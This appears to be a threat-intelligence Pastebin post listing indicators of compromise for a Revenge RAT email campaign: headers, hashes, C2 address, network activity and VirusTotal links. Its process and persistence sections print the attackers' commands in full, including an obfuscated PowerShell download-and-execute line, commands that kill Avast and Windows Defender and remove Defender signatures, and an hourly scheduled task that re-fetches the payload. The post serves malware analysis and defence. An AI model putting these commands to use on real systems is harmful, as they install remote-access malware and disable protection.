SHARE
TWEET

#revengeRAT_110419

VRad Apr 12th, 2019 (edited) 501 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #revenge #RAT #mshta #powershell #RTF #XML #pastebin
  2.  
  3. https://pastebin.com/JKMHyvgx
  4.  
  5. FAQ:
  6. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
  7. https://xakep.ru/2016/09/01/revenge-rat/
  8.  
  9. attack_vector
  10. --------------
  11. email attach .xlam / .doc > mshta GET pastebin1 > powershell > GET pastebin2 (base64) > run decoded exe in memory(!)
  12.  
  13. email_headers
  14. --------------
  15. Received: from maiilboxin.com (unknown [138.197.202.86])
  16. Received: from [216.170.122.25]
  17. Subject: FW:PAYMENT -INV0978
  18. To: user00@victim1.com
  19. From: "Accounting dept." <support@maiilboxin.com>
  20. Date: Thu, 11 Apr 2019 17:25:23 -0700
  21.  
  22. files
  23. --------------
  24. SHA-256     1c0cf0e8e66cff93fb9751874b39bd3099b245c424386d2415fb55c937b31595
  25. File name   INV0978.xlam        [Microsoft Excel 2007+, XML, Macro, Auto_Open]
  26. File size   21.67 KB (22188 bytes)
  27.  
  28. SHA-256     187309d3b4688db0e9e98a40a83a497cbda7baecbaf0d0761f589f059040b670
  29. File name   TT copy.doc (RTF)       [Rich Text Format data, version 1, ANSI]
  30. File size   356.87 KB (365432 bytes)
  31.  
  32. SHA-256     e2c972dacd94f06555b108f96b39f1435202d04c92006721556ffe5cf14c74bd
  33. File name   aiahAcur    (payload_1.exe) [PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows]
  34. File size   17 KB (17408 bytes)
  35.  
  36.  
  37. activity
  38. **************
  39. INV0978.xlam > mshta pastebin{.} com/raw/gnYu4MJK   > powershell pastebin{.} com/raw/aiahAcur
  40.  
  41. TT copy.doc >  mshta pastebin{.} com/raw/gnYu4MJK   > powershell pastebin{.} com/raw/aiahAcur
  42.  
  43. PL_SRC: 104.20.209.21   pastebin{.} com/raw/aiahAcur
  44.  
  45. C2: 23.249.165.151  indexghost{.} duckdns{.} org
  46.  
  47. netwrk
  48. --------------
  49. ssl
  50. 104.20.209.21   pastebin{.} com     Client Hello
  51.  
  52. C2
  53. 23.249.165.151  [TCP ACKed unseen segment] 50092 → 2336 [PSH, ACK] Seq=322 Ack=12 Win=62499 Len=11   
  54.  
  55. comp
  56. --------------
  57. mshta.exe       3540    TCP localhost   50090   104.20.209.21   443 ESTABLISHED
  58. powershell.exe  3960    TCP localhost   50091   104.20.209.21   443 ESTABLISHED
  59. powershell.exe  3960    TCP localhost   50092   23.249.165.151  2336    ESTABLISHED
  60.  
  61. proc
  62. --------------
  63. "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
  64.  
  65. C:\Windows\SysWOW64\mshta.exe  https://pastebin{.} com/raw/gnYu4MJK
  66.  
  67. "C:\Windows\System32\cmd.exe" /C forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & exit
  68. C:\Windows\SysWOW64\forfiles.exe  /c "taskkill /f /im AvastUi.exe"
  69.  
  70. "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files (x86)\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & forfiles /c "taskkill /f /im MSASCuiL.exe" & forfiles /c "taskkill /f /im MpCmdRun.exe" & exit
  71.  
  72. "C:\Windows\System32\forfiles.exe" /c "cmd /c powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)"
  73. C:\Windows\SysWOW64\cmd.exe /c powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)
  74. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)
  75.  
  76. "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://pastebin{.} com/raw/aiahAcur\",0,true)(window.close)" /F
  77.  
  78. persist
  79. --------------
  80. \MSOFFICEER
  81. Microsoft (R) HTML Application host Microsoft Corporation  
  82. c:\windows\system32\mshta.exe   14.10.2013 8:47
  83. "mshta" vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin{.} com/raw/aiahAcur",0,true)(window.close)
  84.  
  85. drop
  86. --------------
  87. [harm]
  88. %temp%\fqkril4n.4zd.ps1
  89.  
  90. [harmless]
  91. %temp%\~DFC438B89F8956E942.TMP
  92. %temp%\9568250.od
  93. %temp%\CVRFFFA.tmp.cvr
  94.  
  95. # # #
  96. https://www.virustotal.com/gui/file/1c0cf0e8e66cff93fb9751874b39bd3099b245c424386d2415fb55c937b31595/details
  97. https://www.virustotal.com/gui/file/187309d3b4688db0e9e98a40a83a497cbda7baecbaf0d0761f589f059040b670/details
  98. https://www.virustotal.com/gui/url/6b8f2a876d58ae681f494eac0d978800b2f3aa3d149abb55f6859c79ae238901/details
  99. https://www.virustotal.com/gui/url/5e197c5b281e3d7a436f2b0800180085e1a5ad5f80b3649ef3225e3fdafa8e38/details
  100. https://www.virustotal.com/gui/file/e2c972dacd94f06555b108f96b39f1435202d04c92006721556ffe5cf14c74bd/details
  101. https://analyze.intezer.com/#/analyses/a6f1dcf3-4672-4297-ac7a-a8f0f5b60c1d
  102.  
  103. VR
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top